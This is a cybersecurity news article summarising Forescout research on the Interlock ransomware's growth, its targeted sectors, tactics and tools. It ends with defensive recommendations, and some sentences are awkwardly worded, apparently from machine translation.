- The Interlock ransomware has reached operational maturity and is now targeting the healthcare, government and manufacturing sectors.
- It supports multi-platform attacks, cloud C2, full lifecycle automation.
- Forescout calls for early detection, behavioral analytics and access control to reduce risk.
Interlock ransomware is no longer a mid-level credential thief. It is now a very complex multi-platform cloud system. ransomware an enterprise with its branches, automation and professional operations.
This is according to new report from Forescout security researchers who have been tracking Interlock since its inception in mid-2024.
The Forescout report states that Interlock entered “operational maturity” (Phase 3) in February 2025, becoming capable of attacking high-value targets in sectors such as healthcare, government and manufacturing.
Operational maturity stage
At the stage of operational maturity, Interlock began to act as a business platform, allowing affiliates or groups of partners to conduct attacks under its name. It has also integrated the full attack lifecycle, no longer relying on fragmented or experimental methods. Everything from initial access and subsequent movement to encryption and data theft can be done with Interlock.
The ransomware has been expanded to target not only Windows servers, but also Linux, BSD and VMware ESXi servers, and now uses legitimate cloud services for command and control (C2) and data theft, including Cloudflare tunnels and Azure's AzCopy utility.
The company has moved from fake update pages to impersonating business software such as FortiClient or Cisco AnyConnect, and has adopted new social engineering baits such as ClickFix and FileFix. Accompanying persons purchased login details from initial access brokers, giving them immediate privileged access. They then used tools such as Cobalt Strike, SystemBC, Putty, PsExec and Posh-SSH to move laterally and control systems across networks.
The malicious platform has also improved its resilience and stealth and now uses the cloud to steal data. Its ransom notes began to sound more professional, and other messages now sound more like corporate “incident alerts,” Forescout added. Now the focus is on the effectiveness of negotiations:
“The tone of communication is typical of business-focused ransomware operations, with emphasis placed on this being a 'security alert' rather than a failure, although communications highlight the consequences of non-payment, including legal liability for disclosing customer data and regulatory penalties under GDPR, HIPAA or other frameworks,” the report highlights.
To protect against blocking, Forescout recommends focusing on early detection of ransomware behavior and reducing the attack surface. This includes using risk-based conditional access policies, implementing behavioral analytics, monitoring PowerShell activity, looking for anomalies in authentication logs, and monitoring for signs of lateral movement.
Follow TechRadar on Google News. And add us as your preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the “Subscribe” button!
And of course you can also Follow TechRadar on TikTok for news, reviews, unboxing videos and get regular updates from us on whatsapp too much.
